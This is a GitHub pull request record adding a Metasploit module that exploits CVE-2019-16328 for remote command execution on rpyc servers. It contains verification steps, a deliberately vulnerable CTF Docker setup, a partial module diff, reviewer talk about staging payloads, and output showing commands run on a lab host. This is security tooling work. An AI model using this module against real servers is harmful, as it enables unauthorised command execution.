### PR TITLE
feat: created module to exploit CVE-2019-16328

### PR DESCRIPTION
**Pull request by ajmeese7**
This PR introduces a module to exploit CVE-2019-16328 and achieve remote command execution on the vulnerable server.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/rpyc_rce`
- [ ] `set RHOST 0.0.0.0`
- [ ] `set RPORT 9999`
- [ ] `set COMMAND cat flag.txt`
- [ ] `run`

## Vulnerable Environment

A vulnerable test environment can be spun up with the environment from [here](https://github.com/dicegang/dicectf-2023-challenges/tree/main/misc/pike).

`Dockerfile`:

```shell
FROM python:3.11.1-slim-bullseye
WORKDIR /app
RUN pip install --no-cache rpyc==4.1.0
COPY server.py flag.txt ./
USER nobody
CMD ["python", "server.py"]
```

`flag.txt`:

```
this is an example!
```

`server.py`:

```py
#!/usr/local/bin/python

import rpyc
from rpyc.utils.server import ThreadedServer

class CalcService(rpyc.Service):
    def exposed_add(self, l, r):
        return l + r
    def exposed_sub(self, l, r):
        return l - r
    def exposed_mul(self, l, r):
        return l * r
    def exposed_div(self, l, r):
        return l / r

if __name__ == "__main__":
    server = ThreadedServer(CalcService, port=9999)
    server.start()
```

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
@ajmeese7 Is there any way this could potentially be made compatible with command stagers? I'm not sure the current implementation would work with these types of payloads.

Additionally we generally prefer exploit modules are coded in Ruby unless there is a compelling reason they need to be in Python. In this case I'm not sure there is a library for the RPC interface you are using so Python might be the only option but I'd like to ask just for checks sake if you have checked to see if there is a Ruby library for the functionality your after?

**Comment by ajmeese7** [comment]
> Additionally we generally prefer exploit modules are coded in Ruby unless there is a compelling reason they need to be in Python. In this case I'm not sure there is a library for the RPC interface you are using so Python might be the only option but I'd like to ask just for checks sake if you have checked to see if there is a Ruby library for the functionality your after?

@gwillcox-r7 `rpyc` stands for "Remote Python Call", it is a Python-only library and there's no Ruby alternative.

> @ajmeese7 Is there any way this could potentially be made compatible with command stagers? I'm not sure the current implementation would work with these types of payloads.

Do you have any examples of Python exploit modules using command stagers that I could reference? IIRC I didn't see any useful documentation on how to go about accomplishing this, so I went with the individual command method.

File: modules/auxiliary/scanner/http/rpyc_rce.py [hunk 1]
```diff
@@ -0,0 +1,102 @@
...
+def run(args):
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOST']))
+    if dependencies_missing:
+        logging.error('Module dependency (rpyc) is missing, cannot continue')
+        return
+
+    try:
+        # Connect to remote host
+        conn = rpyc.connect(args['RHOST'], args['RPORT'])
+        module.log("Connected to RPyC service at {}:{}".format(args['RHOST'], args['RPORT']), 'success')
```
[the remark this answers is not in the document]
Comment (ajmeese7) [reply modules/auxiliary/scanner/http/rpyc_rce.py:53]: AFAICT there's no way to detect the version running on the remote side, which is why the `except AttributeError` line is used to detect if the remote side is not vulnerable. I've opened an issue on the library to confirm, but I haven't seen any documentation indicating that it is possible.

**Comment by gwillcox-r7** [comment]
> Do you have any examples of Python exploit modules using command stagers that I could reference? IIRC I didn't see any useful documentation on how to go about accomplishing this, so I went with the individual command method.

@smcintyre-r7 I believe we were talking about this earlier. Would you have any insights to provide here?

**Comment by smcintyre-r7** [comment]
I'm not aware of any no. We have plenty of ARCH_CMD payloads though. Once #17782 is landed, we'll even have ARCH_CMD payloads that can deliver a native Meterpreter. I'd just go that route and have an exploit with an ARCH_CMD target.

**Comment by gwillcox-r7** [comment]
@ajmeese7 #17782 just landed recently, would you be able to rebase this work against the latest `master` and then add a `ARCH_CMD` target? This will allow this module to use the new fetch payloads which will allow you to drop binary payloads onto the target, expanding the usefulness of the work you have added here :+1:

**Comment by adfoster-r7** [comment]
Verified as working:

```
msf6 auxiliary(scanner/http/rpyc_rce) > run rhosts=127.0.0.1 rport=9999 command='ls -la'

[*] Running for 127.0.0.1...
[*] Connected to RPyC service at 127.0.0.1:9999
[*] Executing command: ls -la
[*] Command result: total 16
drwxr-xr-x 1 root root 4096 Jun 14 22:23 .
drwxr-xr-x 1 root root 4096 Jun 14 22:23 ..
-rw-r--r-- 1 root root    6 Jun 14 22:22 flag.txt
-rw-r--r-- 1 root root  431 Jun 14 22:22 server.py
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I think it could make sense to iterate on this to make better use out of Metasploit's payload functionality in the future, but I think it's good to ship in its current form - thanks! :+1:

**Comment by adfoster-r7** [comment]
## Release Notes

Adds a new `rpyc_rce` module to exploit CVE-2019-16328 and achieve remote command execution on the vulnerable server

**Pull request merged**